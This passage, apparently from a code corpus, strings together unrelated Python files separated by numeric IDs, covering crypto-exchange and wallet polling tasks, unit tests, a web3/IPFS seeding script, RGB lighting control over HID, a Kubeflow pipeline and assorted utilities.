ExchangeTicker.DoesNotExist: # print("2Тикер не найден") return 0, 'Not found' except ExchangeTicker.DoesNotExist: # print("1Тикер не найден") return 0, 'Not found' except ExchangeCoin.DoesNotExist: # print('Валюта не найдена') return 0, 'Not found' @periodic_task(run_every=datetime.timedelta(minutes=5)) def pull_exchanges_tickers(): exchanges = Exchanges.objects.all() for exchange in exchanges: exchange_object = class_for_name('ccxt', exchange.name)() try: for item, value in exchange_object.fetch_tickers().items(): pair = re.match(r'([a-zA-Z0-9]+)/([a-zA-Z0-9]+)', item) try: main_coin = ExchangeCoin.objects.get(exchange=exchange, symbol=pair.group(2)) second_coin = ExchangeCoin.objects.get(exchange=exchange, symbol=pair.group(1)) pair = Pair.objects.get(main_coin=main_coin, second_coin=second_coin) new_ticker = ExchangeTicker() new_ticker.exchange_id = exchange.pk new_ticker.pair_id = pair.pk new_ticker.high = value['high'] new_ticker.low = value['low'] new_ticker.bid = value['bid'] new_ticker.ask = value['ask'] new_ticker.base_volume = value['baseVolume'] new_ticker.last = value['last'] new_ticker.date_time = value['datetime'] new_ticker.save() except ExchangeCoin.DoesNotExist: pass except Pair.DoesNotExist: pass except ExchangeNotAvailable: continue # pull_exchanges_balances.delay() return True @app.task() def pull_exchanges(): get_all_coins.delay() exchanges = Exchanges.objects.all() for exchange in exchanges: exchange_object = class_for_name('ccxt', exchange.name)() markets = exchange_object.fetch_markets() for item in markets: coins = [item['quote'], item['base']] for coin in coins: try: market_cup_coin = CoinMarketCupCoin.objects.filter(symbol=coin.lower()).earliest('rank') if market_cup_coin: try: old_coin = ExchangeCoin.objects.get(exchange=exchange, symbol=coin.lower()) old_coin.rank = market_cup_coin.rank old_coin.save() except ExchangeCoin.DoesNotExist: new_coin = ExchangeCoin() new_coin.exchange = exchange new_coin.symbol = coin.lower() new_coin.rank = market_cup_coin.rank new_coin.save() except CoinMarketCupCoin.DoesNotExist: pass try: coin = ExchangeCoin.objects.get(exchange=exchange, symbol=coins[0].lower()) ExchangeMainCoin.objects.get_or_create(coin=coin) except ExchangeCoin.DoesNotExist: pass try: main_coin = ExchangeCoin.objects.get(exchange=exchange, symbol=coins[0].lower()) second_coin = ExchangeCoin.objects.get(exchange=exchange, symbol=coins[1].lower()) try: old_pair = Pair.objects.get(main_coin=main_coin, second_coin=second_coin) frozen = exchange.info_frozen_key field = frozen.replace('-', '') if frozen.startswith('-'): old_pair.is_active = not bool(int(item['info'][field])) else: old_pair.is_active = bool(int(item['info'][field])) old_pair.save() except Pair.DoesNotExist: pair = Pair() pair.main_coin = main_coin pair.second_coin = second_coin frozen = exchange.info_frozen_key field = frozen.replace('-', '') if frozen.startswith('-'): pair.is_active = not bool(int(item['info'][field])) else: pair.is_active = bool(int(item['info'][field])) pair.save() except ExchangeCoin.DoesNotExist: pass return True @app.task() def get_all_coins(): response = requests.get('https://poloniex.com/public?command=returnCurrencies').json() for item in response: try: Coin.objects.get(short_name=item) except Coin.DoesNotExist: new_coin = Coin() new_coin.short_name = item new_coin.full_name = response[item]['name'] new_coin.save() return True @periodic_task(run_every=crontab(minute='*/2')) def get_eth_wallet_history(): wallet, c = Wallets.objects.get_or_create(name='ETH') eth_uw = UserWallet.objects.filter(wallet=wallet) eth_to_btc = CryptoConvert('btc', 'eth') eth_to_usd = CryptoConvert('usd', 'eth') if len(eth_uw) > 0: for uw in eth_uw: balance = requests.get( 'https://api.etherscan.io/api?module=account&action=balance&address=' + uw.address + '&tag=latest&apikey=<KEY>').json() if balance['status'] == str(1): uw.balance = balance['result'] uw.total_usd = eth_to_usd.convert('usd', 'eth', round(float(float(balance['result']) / (10 ** 18)), 8)) uw.total_btc = eth_to_btc.convert('btc', 'eth', round(float(float(balance['result']) / (10 ** 18)), 8)) uw.save() history = requests.get( 'https://api.etherscan.io/api?module=account&action=txlist&address=' + uw.address + '&startblock=0&endblock=99999999&sort=desc&apikey=<KEY>').json() if history['status'] == str(1): for item in history['result']: try: Transaction.objects.get(hash=item['hash'], name=uw.wallet.name + str(uw.pk)) except Transaction.MultipleObjectsReturned: pass except Transaction.DoesNotExist: transaction = Transaction() transaction.name = uw.wallet.name + str(uw.pk) transaction.t_type = 'wallet' transaction.number = item['blockNumber'] transaction.date = datetime.datetime.fromtimestamp(int(item['timeStamp'])).strftime( '%Y-%m-%d %H:%M:%S') transaction.t_from = item['from'] transaction.t_to = item['to'] transaction.currency = 'ETH' if item['to'] == uw.address.lower(): transaction.type = 'in' elif item['from'] == uw.address.lower(): transaction.type = 'out' else: transaction.type = 'unknown' transaction.value = item['value'] transaction.usd_value = eth_to_usd.convert('usd', 'eth', round(float(float(item['value']) / (10 ** 18)), 8)) transaction.hash = item['hash'] transaction.block_hash = item['blockHash'] transaction.save() print('ok') else: print("Кошельки отсутствуют") return True @periodic_task(run_every=crontab(minute='*/2')) def get_btc_wallet_history(): wallet, c = Wallets.objects.get_or_create(name='BTC') btc_uw = UserWallet.objects.filter(wallet=wallet) if len(btc_uw) > 0: for uw in btc_uw: btc_to_usd = CryptoConvert('usd', 'btc') data = requests.get('https://blockchain.info/ru/rawaddr/' + uw.address) try: transactions = data.json() if transactions: uw.balance = transactions['final_balance'] / 100000000 uw.total_usd = btc_to_usd.convert('usd', 'btc', uw.balance) uw.total_btc = uw.balance uw.save() for item in transactions['txs']: try: transaction = Transaction.objects.get(name=uw.wallet.name + str(uw.pk), hash=item['hash']) except Transaction.MultipleObjectsReturned: pass except Transaction.DoesNotExist: transaction = Transaction() transaction.name = uw.wallet.name + str(uw.pk) transaction.t_type = 'wallet' transaction.number = item['tx_index'] transaction.date = datetime.datetime.fromtimestamp(item['time']) transaction.currency = 'BTC' t_from = '' transaction.type = 'unknown' for item_from in item['inputs']: t_from += item_from['prev_out']['addr'] + '<br/>' if item_from['prev_out']['addr'] == uw.address: transaction.type = 'out' transaction.value = _D(item_from['prev_out']['value']) / _D(100000000) t_to = '' for item_to in item['out']: t_to += item_to['addr'] + '<br/>' if item_to['addr'] == uw.address: transaction.type = 'in' transaction.value = _D(item_to['value']) / _D(100000000) transaction.t_to = t_to transaction.t_from = t_from transaction.usd_value = btc_to_usd.convert('usd', 'btc', _D(transaction.value)) transaction.hash = item['hash'] transaction.block_hash = '-' transaction.save() except JSONDecodeError as json_er: print('Ошибка разбора ответа: {}'.format(json_er)) continue else: print("Кошельки отсутствуют") return True @periodic_task(run_every=crontab(minute='*/2')) def get_yandex_wallet_history(): wallet, c = Wallets.objects.get_or_create(name='Yandex Money') yandex_uw = UserWallet.objects.filter(wallet=wallet) if len(yandex_uw) > 0: for uw in yandex_uw: access_token = uw.access_token if access_token is not None: yandex_wallet_object = Wallet(access_token) account_info = yandex_wallet_object.account_info() uw.balance = account_info['balance'] uw.total_btc = get_btc_value('rur', account_info['balance']) uw.total_usd = get_usd_value('rur', account_info['balance']) uw.save() get_yandex_records(wallet=yandex_wallet_object, uw=uw) print('ok') else: print("Кошельки отсутствуют") return True def get_yandex_records(wallet=None, uw=None, next_record=0): transactions = wallet.operation_history( {'start_record': int(next_record), 'details': 'true', 'records': 100}) rur_to_usd = CryptoConvert('usd', 'rur') for t in transactions['operations']: try: Transaction.objects.get(name=uw.wallet.name + str(uw.pk), number=t['operation_id']) except Transaction.MultipleObjectsReturned: pass except Transaction.DoesNotExist: new_transaction = Transaction() new_transaction.name = uw.wallet.name + str(uw.pk) new_transaction.t_type = 'wallet' new_transaction.number = new_transaction.hash = t['operation_id'] new_transaction.date = t['datetime'] new_transaction.type = t['direction'] new_transaction.currency = 'RUR' new_transaction.t_from = new_transaction.t_to = '-' if 'details' in t: if len(t['details']) > 0: new_transaction.details = t['details'] if 'title' in t: if len(t['title']) > 0: new_transaction.title = t['title'] new_transaction.value = t['amount'] new_transaction.usd_value = rur_to_usd.convert('usd', 'rur', float(t['amount'])) # new_transaction.usd_value = get_usd_value('rur', float(t['amount'])) new_transaction.save() try: next_rec = transactions['next_record'] except KeyError: next_rec = None if next_rec is not None: get_yandex_records(wallet, uw=uw, next_record=transactions['next_record']) @periodic_task(run_every=crontab(minute='*/1')) def calculate_holdings_history(): date = datetime.datetime.fromtimestamp(int(time.time())).strftime('%Y-%m-%d %H:%M:%S') users = User.objects.all() for user in users: wallets = UserWallet.objects.filter(user=user) if len(wallets) > 0: for wallet in wallets: holdings = UserHoldings() holdings.user = user holdings.type = 'Wallet@' + wallet.wallet.name + '(' + str(wallet.pk) + ')' holdings.total_btc = wallet.total_btc holdings.total_usd = wallet.total_usd holdings.date_time = date holdings.save() exchanges = UserExchange.objects.filter(user=user) if len(exchanges) > 0: for exchange in exchanges: holdings = UserHoldings() holdings.user = user holdings.type = 'Exchange@' + exchange.exchange.name + '(' + str(exchange.pk) + ')' holdings.total_btc = exchange.total_btc holdings.total_usd = exchange.total_usd holdings.date_time = date holdings.save() return True def get_btc_value(coin_name=None, count=None): time.sleep(0.1) if not coin_name or not count: return 0 else: if coin_name == 'dsh' or coin_name == 'DSH': coin_name = 'dash' response = requests.get('https://api.cryptonator.com/api/ticker/btc-' + coin_name.lower()).json() if response['success']: return float(count) / float(response['ticker']['price']) else: return 0 def get_usd_value(coin_name=None, count=None): time.sleep(0.1) if not coin_name or not count: return 0 else: if coin_name == 'dsh' or coin_name == 'DSH': coin_name = 'dash' response = requests.get('https://api.cryptonator.com/api/ticker/usd-' + coin_name.lower()).json() if response['success']: return float(count) / float(response['ticker']['price']) else: return 0 class CryptoConvert: def __init__(self, coin_one_name, coin_two_name): if coin_two_name == 'dsh' or coin_two_name == 'DSH': coin_two_name = 'dash' if coin_one_name == 'dsh' or coin_one_name == 'DSH': coin_one_name = 'dash' self.coin_one_name = coin_one_name self.coin_two_name = coin_two_name self.price = None def get_price(self): if self.price is None: response = requests.get( 'https://api.cryptonator.com/api/ticker/' + self.coin_one_name.lower() + '-' + self.coin_two_name.lower()).json() if response['success']: self.price = response['ticker']['price'] return self.price def convert(self, coin_one_name, coin_two_name, count): if coin_one_name == self.coin_one_name and coin_two_name == self.coin_two_name: self.get_price() else: self.coin_one_name = coin_one_name self.coin_two_name = coin_two_name self.price = None self.get_price() return float(count) / float(self.price)
11570483
import machine import pytest @pytest.fixture def timer(): return machine.Timer(0) def test_timer_does_not_run_on_construction(timer): assert not timer.is_running_for_testing def test_timer_runs_on_init(timer): timer.init(period=1000) assert timer.is_running_for_testing
11570517
from django.conf import settings DEFAULT_CONDITIONS = [ ('django_email_multibackend.conditions.MatchAll', {}) ] EMAIL_BACKENDS_CONDITIONS = getattr(settings, 'EMAIL_BACKENDS_CONDITIONS', {}) EMAIL_BACKENDS_WEIGHTS = getattr(settings, 'EMAIL_BACKENDS_WEIGHTS', tuple()) EMAIL_BACKENDS = getattr(settings, 'EMAIL_BACKENDS', {})
11570540
import warnings import sys import os from distutils.version import StrictVersion def warn(msg): print msg warnings.warn(msg) warn.count += 1 warn.count = 0 def check_import(package_name, version=None): try: pkg = __import__(package_name) except ImportError: warn("Package {0} is not available".format(package_name)) return if version: pkg_version = pkg.__version__.rstrip('git').rstrip('-') if StrictVersion(str(pkg_version)) < str(version): warn("Package {0} is version {1}; " "{2} or greater is recommended".format(pkg, pkg.__version__, version)) # check Python version if not (2, 6) <= sys.version_info[:2] <= (2, 7): warn("Python 2.6 - 2.7 recommended") # check package versions check_import('numpy', '1.5') check_import('scipy', '0.11') check_import('IPython', '0.13') check_import('matplotlib', '1.0') check_import('sklearn', '0.12') check_import('nose') if warn.count > 0: print(" - warning count: {0}.".format(warn_count)) print(" Consider upgrading your Python install:") print(" Anaconda is a good all-in-one option: ") print(" https://store.continuum.io/".format(warn.count)) else: print(" - no warnings: Congratulations! ") print(" Your Python installation appears up-to-date!") print(" - please confirm that typing ``ipython notebook`` at your terminal") print(" launches a browser window to the IPython dashboard. If not,") print(" then there are other packages which must be installed. For") print(" an easy all-in-one installation, try Anaconda:") print(" https://store.continuum.io/")
11570570
import os from dash_slicer.docs import get_reference_docs, md_seperator HERE = os.path.dirname(os.path.abspath(__file__)) def test_that_the_docs_build(): x = get_reference_docs() assert "VolumeSlicer(app, vol" in x assert "create_overlay_data(mask" in x assert "performance" in x.lower() def test_that_reference_docs_in_readme_are_up_to_date(): filename = os.path.join(os.path.dirname(HERE), "README.md") assert os.path.isfile(filename) with open(filename, "rb") as f: text = f.read().decode() _, _, ref = text.partition(md_seperator) ref1 = ref.strip().replace("\r\n", "\n") ref2 = get_reference_docs().strip() assert ( ref1 == ref2 ), "Reference docs in readme are outdated. Run `python update_docs_in_readme.py`"
11570580
class Pizza: def ingredientes(self): return 'Ingredientes' class Mussarela(Pizza): def ingredientes(self): return ['quejo mussarela', 'molho de tomate', 'oregano']
11570599
import os, json import ipfsapi from web3 import Web3, IPCProvider from populus.utils.wait import wait_for_transaction_receipt w3 = Web3(IPCProvider('/tmp/geth.ipc')) common_password = '<PASSWORD>' accounts = [] with open('accounts.txt', 'w') as f: for i in range(4): account = w3.personal.newAccount(common_password) accounts.append(account) f.write(account + "\n") with open('address.txt', 'r') as f: address = f.read().rstrip("\n") with open('videos_sharing_smart_contract/build/contracts.json') as f: contract = json.load(f) abi = contract['VideosSharing']['abi'] VideosSharing = w3.eth.contract(address=address, abi=abi) c = ipfsapi.connect() coinbase = w3.eth.accounts[0] coinbase_password = '<PASSWORD>' # Transfering Ethers for destination in accounts: nonce = w3.eth.getTransactionCount(Web3.toChecksumAddress(coinbase)) txn = { 'from': coinbase, 'to': Web3.toChecksumAddress(destination), 'value': w3.toWei('100', 'ether'), 'gas': 70000, 'gasPrice': w3.toWei('1', 'gwei'), 'nonce': nonce } txn_hash = w3.personal.sendTransaction(txn, coinbase_password) wait_for_transaction_receipt(w3, txn_hash) # Transfering Coins for destination in accounts: nonce = w3.eth.getTransactionCount(coinbase) txn = VideosSharing.functions.transfer(destination, 100).buildTransaction({ 'from': coinbase, 'gas': 70000, 'gasPrice': w3.toWei('1', 'gwei'), 'nonce': nonce }) txn_hash = w3.personal.sendTransaction(txn, coinbase_password) wait_for_transaction_receipt(w3, txn_hash) # Uploading Videos directory = 'stock_videos' movies = os.listdir(directory) length_of_movies = len(movies) for index, movie in enumerate(movies): account = accounts[index//7] ipfs_add = c.add(directory + '/' + movie) ipfs_path = ipfs_add['Hash'].encode('utf-8') title = movie.rstrip('.mp4')[:20].encode('utf-8') nonce = w3.eth.getTransactionCount(Web3.toChecksumAddress(account)) txn = VideosSharing.functions.upload_video(ipfs_path, title).buildTransaction({ 'from': account, 'gas': 200000, 'gasPrice': w3.toWei('30', 'gwei'), 'nonce': nonce }) txn_hash = w3.personal.sendTransaction(txn, common_password) wait_for_transaction_receipt(w3, txn_hash)
11570646
from contextlib import contextmanager from bearlibterminal import terminal as _terminal from .nice_terminal import NiceTerminal from .state import blt_state from clubsandwich.geom import Point class BearLibTerminalContext(NiceTerminal): """ A class that acts like :py:attr:`clubsandwich.blt.nice_terminal.terminal` (you can use :py:class:`Point` and :py:class:`Rect` instead of separate ints), except: * It's a class, so you have to instantiate it * It includes a context manager, :py:meth:`translate`, that offsets all position-related calls. * Multiple calls to :py:meth:`color` and :py:meth:`bkcolor` with the same values are ignored, saving time in the C FFI bridge. Example:: from clubsandwich.blt.context import BearLibTerminalContext from clubsandwich.geom import Point ctx = BearLibTerminalContext() ctx.open() a = Point(10, 10) with ctx.translate(a): terminal.put(Point(0, 0), 'a') terminal.put(Point(1, 1), 'b') terminal.refresh() terminal.read() terminal.close() """ def __init__(self): super().__init__() self.offset = Point(0, 0) self._crop_rect = None self._fg = blt_state.color self._bg = blt_state.bkcolor @contextmanager def translate(self, offset_delta): """ Inside this context manager, all put/print calls are offset by the given amount. If you nest these, they stack. """ old_offset = self.offset self.offset = self.offset + offset_delta yield self.offset = old_offset def color(self, c): self._fg = c return _terminal.color(c) def bkcolor(self, c): self._bg = c return _terminal.bkcolor(c) def clear_area(self, rect, *args): computed_rect = rect.moved_by(self.offset) if self._crop_rect and not self._crop_rect.intersects(computed_rect): return return super().clear_area(computed_rect, *args) def crop(self, rect, *args): computed_rect = rect.moved_by(self.offset) if self._crop_rect and not self._crop_rect.intersects(rect): return return super().crop(computed_rect, *args) def print(self, point, *args): computed_point = point + self.offset if self._crop_rect and not self._crop_rect.contains(computed_point): return return super().print(computed_point, *args) def printf(self, point, *args): computed_point = point + self.offset if self._crop_rect and not self._crop_rect.contains(computed_point): return return super().printf(computed_point, *args) def put(self, point, char): computed_point = point + self.offset if self._crop_rect and not self._crop_rect.contains(computed_point): return return super().put(computed_point, char) def pick(self, point, *args): computed_point = point + self.offset if self._crop_rect and not self._crop_rect.contains(computed_point): return return super().pick(computed_point, *args) def pick_color(self, point, *args): computed_point = point + self.offset if self._crop_rect and not self._crop_rect.contains(computed_point): return return super().pick_color(computed_point, *args) def pick_bkcolor(self, point, *args): computed_point = point + self.offset if self._crop_rect and not self._crop_rect.contains(computed_point): return return super().pick_bkcolor(computed_point, *args) def put_ext(self, point, *args): computed_point = point + self.offset if self._crop_rect and not self._crop_rect.contains(computed_point): return return super().put_ext(computed_point, *args) def read_str(self, point, *args): computed_point = point + self.offset if self._crop_rect and not self._crop_rect.contains(computed_point): return return super().read_str(computed_point, *args)
11570655
import numpy as np from deepnet.utils import softmax from deepnet.layers import Conv, FullyConnected def l2_regularization(layers, lam=0.001): reg_loss = 0.0 for layer in layers: if hasattr(layer, 'W'): reg_loss += 0.5 * lam * np.sum(layer.W * layer.W) return reg_loss def delta_l2_regularization(layers, grads, lam=0.001): for layer, grad in zip(layers, reversed(grads)): if hasattr(layer, 'W'): grad[0] += lam * layer.W return grads def l1_regularization(layers, lam=0.001): reg_loss = 0.0 for layer in layers: if hasattr(layer, 'W'): reg_loss += lam * np.sum(np.abs(layer.W)) return reg_loss def delta_l1_regularization(layers, grads, lam=0.001): for layer, grad in zip(layers, reversed(grads)): if hasattr(layer, 'W'): grad[0] += lam * layer.W / (np.abs(layer.W) + 1e-8) return grads def SoftmaxLoss(X, y): m = y.shape[0] p = softmax(X) log_likelihood = -np.log(p[range(m), y]) loss = np.sum(log_likelihood) / m dx = p.copy() dx[range(m), y] -= 1 dx /= m return loss, dx
11570725
import matplotlib.pylab as plt import os import sys print sys.path import numpy import scipy import os from scipy import interpolate from scipy import integrate def intercec(A,B): if A[0] < B[0]: ini = B[0] else: ini = A[0] if A[-1] < B[-1]: fin = A[-1] else: fin = B[-1] return ini,fin def CCF(L1,F1,L2,F2,vi,vf): lux = 299792.458 vel = vi delta = L1[1]-L1[0] CF = [] vels = [] while vel <=vf: L2p = L2*(1-vel/lux) ini,fin = intercec(L1,L2p) I = numpy.where((L1 >= ini) & (L1 <= fin))[0] II = numpy.where((L2p >= ini) & (L2p <= fin))[0] if len(I)==0 or len(II)==0: print 'Problem: no wavelenght intersection' wav = numpy.arange(ini,fin,delta) tck1 = interpolate.splrep(L1,F1,k=3,s=0) tck2 = interpolate.splrep(L2p,F2,k=3,s=0) F1s = interpolate.splev(wav,tck1,der=0) F2s = interpolate.splev(wav,tck2,der=0) CF.append(numpy.add.reduce(F1s*F2s)/numpy.sqrt(numpy.add.reduce(F1s*F1s)*numpy.add.reduce(F2s*F2s))) vels.append(vel) vel = vel + 1 return vels,CF
11570733
from typing import List import hid import mystic_why.common.const as const from mystic_why.common.enums import LightArea from mystic_why.common.exception import DeviceNotFound, AreaNotFound class Color: @staticmethod def create_by_hex(hex_value): hex_value = hex_value.lstrip('#') return Color(*tuple(int(hex_value[i:i + 2], 16) for i in (0, 2, 4))) def __init__(self, red, green, blue): self.red = red self.green = green self.blue = blue class Led: def __init__(self, index: int, color: Color): self.index = index self.color = color class BaseLightning: def __init__(self): self.device = hid.device() self.open_device() def get_current_state(self): return self.device.get_feature_report(const.HID_STATE_REPORT_ID, const.HID_STATE_REPORT_LEN) def open_device(self): try: device_info = next(d for d in hid.enumerate() if d['product_string'] == const.MSI_PRODUCT_STRING) except StopIteration: raise DeviceNotFound self.device.open(device_info['vendor_id'], device_info['product_id']) class FullLightning(BaseLightning): def __init__(self): super().__init__() self.msg = [] def fill_color_for_area(self, area, color: Color): if area == LightArea.JONBOARD: color_bytes = [const.FULL_LIGHT_ONBOARD] elif area == LightArea.JRAINBOW1: color_bytes = [const.FULL_LIGHT_JRAINBOW1] elif area == LightArea.JRAINBOW2: color_bytes = [const.FULL_LIGHT_JRAINBOW2] else: color_bytes = [const.FULL_LIGHT_ONBOARD, const.FULL_LIGHT_JRAINBOW1, const.FULL_LIGHT_JRAINBOW2] for color_byte in color_bytes: self.msg[color_byte] = color.red self.msg[color_byte + 1] = color.green self.msg[color_byte + 2] = color.blue def set_full_light(self, color: Color, area='ALL'): self.msg = self.get_current_state() self.fill_color_for_area(area, color) self.device.send_feature_report(self.msg) class PerLedLightning(BaseLightning): def __init__(self, enable=True): super().__init__() self.current_state = self.get_current_state() if enable: self.enable_per_led() def enable_per_led(self): self.device.send_feature_report(const.ENABLE_PER_LED_MSG) def revert_to_full(self): self.device.send_feature_report(self.current_state) def set_led_colors(self, feature_data: List[int], led_info: List[Led]): for led in led_info: feature_data[(led.index % (len(feature_data) // 3)) * 3] = led.color.red feature_data[(led.index % (len(feature_data) // 3)) * 3 + 1] = led.color.green feature_data[(led.index % (len(feature_data) // 3)) * 3 + 2] = led.color.blue def get_color_bytes_by_area(self, area, current_state: List[int]): area_info = { LightArea.JONBOARD: {'start_byte': const.FULL_LIGHT_ONBOARD, 'led_count': const.ONBOARD_LED_COUNT}, LightArea.JRAINBOW1: {'start_byte': const.FULL_LIGHT_JRAINBOW1, 'led_count': const.JRAINBOW1_LED_COUNT}, LightArea.JRAINBOW2: {'start_byte': const.FULL_LIGHT_JRAINBOW2, 'led_count': const.JRAINBOW2_LED_COUNT} } try: selected_area = area_info[area] except KeyError: raise AreaNotFound start_byte = selected_area['start_byte'] led_count = selected_area['led_count'] return [current_state[start_byte], current_state[start_byte + 1], current_state[start_byte + 2]] * led_count def set_led_light(self, area, led_info, background_color=None): if background_color is None: background_color = Color(0, 0, 0) msg_onboard = self.get_color_bytes_by_area(LightArea.JONBOARD, self.current_state) msg_rainbow1 = self.get_color_bytes_by_area(LightArea.JRAINBOW1, self.current_state) msg_rainbow2 = self.get_color_bytes_by_area(LightArea.JRAINBOW2, self.current_state) # TODO: not supported msg_corsair = [0, 0, 0] * const.CORSAIR_LED_COUNT empty_trail = [0] * const.EMPTY_TRAIL_LEN if area == LightArea.JONBOARD: if background_color: msg_onboard = [background_color.red, background_color.green, background_color.blue] * const.ONBOARD_LED_COUNT self.set_led_colors(msg_onboard, led_info) elif area == LightArea.JRAINBOW1: if background_color: msg_rainbow1 = [background_color.red, background_color.green, background_color.blue] * const.JRAINBOW1_LED_COUNT self.set_led_colors(msg_rainbow1, led_info) elif area == LightArea.JRAINBOW2: if background_color: msg_rainbow2 = [background_color.red, background_color.green, background_color.blue] * const.JRAINBOW2_LED_COUNT self.set_led_colors(msg_rainbow2, led_info) elif area == LightArea.ALL: if background_color: msg_onboard = [background_color.red, background_color.green, background_color.blue] * const.ONBOARD_LED_COUNT msg_rainbow1 = [background_color.red, background_color.green, background_color.blue] * const.JRAINBOW1_LED_COUNT msg_rainbow2 = [background_color.red, background_color.green, background_color.blue] * const.JRAINBOW2_LED_COUNT self.set_led_colors(msg_onboard, led_info) self.set_led_colors(msg_rainbow1, led_info) self.set_led_colors(msg_rainbow2, led_info) else: raise AreaNotFound feature_data = const.PER_LED_MSG_HEADER + msg_onboard + msg_rainbow1 + msg_rainbow2 + msg_corsair + empty_trail self.device.send_feature_report(feature_data)
11570741
from backend.common.consts.model_type import ModelType from backend.common.models.account import Account from backend.common.models.favorite import Favorite from backend.common.queries.favorite_query import FavoriteQuery def test_no_favorites() -> None: account = Account(id="uid") favorites = FavoriteQuery(account=account).fetch() assert favorites == [] def test_favorites() -> None: account = Account(id="uid") favorite = Favorite( parent=account.key, user_id=account.key.id(), model_key="frc7332", model_type=ModelType.TEAM, ) favorite.put() favorites = FavoriteQuery(account=account).fetch() assert favorites == [favorite] def test_favorites_keys_only() -> None: account = Account(id="uid") favorite = Favorite( parent=account.key, user_id=account.key.id(), model_key="frc7332", model_type=ModelType.TEAM, ) favorite.put() favorites = FavoriteQuery(account=account, keys_only=True).fetch() assert favorites == [favorite.key]
11570775
import kfp.dsl as dsl import kfp.gcp as gcp def evaluate_op( *, gcs_bucket, pose_estimation_gcs_path, log_dir, docker_image, memory_limit, num_gpu, gpu_type, checkpoint_file=None, ): """ Create a Kubeflow ContainerOp to train an estimator on the cube sphere dataset. Args: gcs_bucket: GCS Bucket where the datasets are located pose_estimation_gcs_path: Path inside the gcp bucket where the datasets are located log_dir: path to save the Tensorboard event files. docker_image (str): Docker image registry URI. memory_limit (str): Set memory limit for this operator. For simplicity, we set memory_request = memory_limit. num_gpu (int): Set the number of GPU for this operator gpu_type (str): Set the type of GPU Returns: kfp.dsl.ContainerOp: Represents an op implemented by a container image to train an estimator. """ command = ["python", "-m", "pose_estimation.cli"] arguments = [ "evaluate", "--config-file=config.yaml", "--download-data-gcp=True", f"--gcs-bucket={gcs_bucket}", f"--pose-estimation-gcs-path={pose_estimation_gcs_path}", f"--log-dir={log_dir}", ] evalulate = dsl.ContainerOp( name="train", image=docker_image, command=command, arguments=arguments, ) # GPU evalulate.set_gpu_limit(num_gpu) evalulate.add_node_selector_constraint( "cloud.google.com/gke-accelerator", gpu_type ) evalulate.set_memory_request(memory_limit) evalulate.set_memory_limit(memory_limit) evalulate.apply(gcp.use_gcp_secret("user-gcp-sa")) return evalulate @dsl.pipeline( name="evalulate pipeline", description="evalulate the model using kubeflow pipeline", ) def evalulate_pipeline_single_cube( docker_image: str = "", gcs_bucket: str = "", pose_estimation_gcs_path: str = "", logdir: str = "", ): memory_limit = "64Gi" num_gpu = 1 gpu_type = "nvidia-tesla-v100" # Pipeline definition evaluate_op( gcs_bucket=gcs_bucket, pose_estimation_gcs_path=pose_estimation_gcs_path, log_dir=logdir, docker_image=docker_image, memory_limit=memory_limit, num_gpu=num_gpu, gpu_type=gpu_type, ) if __name__ == "__main__": import kfp.compiler as compiler compiler.Compiler().compile( evalulate_pipeline_single_cube, __file__ + ".tar.gz" )
11570787
def launchTensorBoard(): import os PATH = os.getcwd() os.system('tensorboard --logdir=' + 'embedding-logs') return import threading t = threading.Thread(target=launchTensorBoard, args=([])) t.start() #In your browser, enter http://localhost:6006 as the URL #add #projector to the URL if necessary: http://localhost:6006/#projector
11570808
import os from collections import namedtuple import pytest from leapp.exceptions import StopActorExecutionError from leapp.libraries.actor import addupgradebootentry from leapp.libraries.common.config.architecture import ARCH_X86_64, ARCH_S390X from leapp.libraries.common.testutils import CurrentActorMocked from leapp.libraries.stdlib import api from leapp.models import BootContent CUR_DIR = os.path.dirname(os.path.abspath(__file__)) class run_mocked(object): def __init__(self): self.args = [] def __call__(self, args, split=False): self.args.append(args) class write_to_file_mocked(object): def __init__(self): self.content = None def __call__(self, filename, content): self.content = content CONFIGS = ['/boot/grub2/grub.cfg', '/boot/efi/EFI/redhat/grub.cfg'] RunArgs = namedtuple('RunArgs', 'args_remove args_add args_zipl args_len') run_args_remove = [ '/usr/sbin/grubby', '--remove-kernel', '/abc' ] run_args_add = [ '/usr/sbin/grubby', '--add-kernel', '/abc', '--initrd', '/def', '--title', 'RHEL-Upgrade-Initramfs', '--copy-default', '--make-default', '--args', 'debug enforcing=0 rd.plymouth=0 plymouth.enable=0' ] run_args_zipl = ['/usr/sbin/zipl'] @pytest.mark.parametrize('run_args, arch', [ # non s390x (RunArgs(run_args_remove, run_args_add, None, 2), ARCH_X86_64), # s390x (RunArgs(run_args_remove, run_args_add, run_args_zipl, 3), ARCH_S390X), # config file specified (RunArgs(run_args_remove, run_args_add, None, 2), ARCH_X86_64), ]) def test_add_boot_entry(monkeypatch, run_args, arch): def get_boot_file_paths_mocked(): return '/abc', '/def' monkeypatch.setattr(addupgradebootentry, 'get_boot_file_paths', get_boot_file_paths_mocked) monkeypatch.setenv('LEAPP_DEBUG', '1') monkeypatch.setattr(addupgradebootentry, 'run', run_mocked()) monkeypatch.setattr(api, 'current_actor', CurrentActorMocked(arch)) addupgradebootentry.add_boot_entry() assert len(addupgradebootentry.run.args) == run_args.args_len assert addupgradebootentry.run.args[0] == run_args.args_remove assert addupgradebootentry.run.args[1] == run_args.args_add if run_args.args_zipl: assert addupgradebootentry.run.args[2] == run_args.args_zipl def test_add_boot_entry_configs(monkeypatch): def get_boot_file_paths_mocked(): return '/abc', '/def' monkeypatch.setattr(addupgradebootentry, 'get_boot_file_paths', get_boot_file_paths_mocked) monkeypatch.setenv('LEAPP_DEBUG', '1') monkeypatch.setattr(addupgradebootentry, 'run', run_mocked()) monkeypatch.setattr(api, 'current_actor', CurrentActorMocked(ARCH_X86_64)) addupgradebootentry.add_boot_entry(CONFIGS) assert len(addupgradebootentry.run.args) == 4 assert addupgradebootentry.run.args[0] == run_args_remove + ['-c', CONFIGS[0]] assert addupgradebootentry.run.args[1] == run_args_remove + ['-c', CONFIGS[1]] assert addupgradebootentry.run.args[2] == run_args_add + ['-c', CONFIGS[0]] assert addupgradebootentry.run.args[3] == run_args_add + ['-c', CONFIGS[1]] def test_get_boot_file_paths(monkeypatch): # BootContent message available def consume_message_mocked(*models): yield BootContent(kernel_path='/ghi', initram_path='/jkl') monkeypatch.setattr('leapp.libraries.stdlib.api.consume', consume_message_mocked) kernel_path, initram_path = addupgradebootentry.get_boot_file_paths() assert kernel_path == '/ghi' and initram_path == '/jkl' # No BootContent message available def consume_no_message_mocked(*models): yield None monkeypatch.setattr('leapp.libraries.stdlib.api.consume', consume_no_message_mocked) with pytest.raises(StopActorExecutionError): addupgradebootentry.get_boot_file_paths() def test_fix_grub_config_error(monkeypatch): 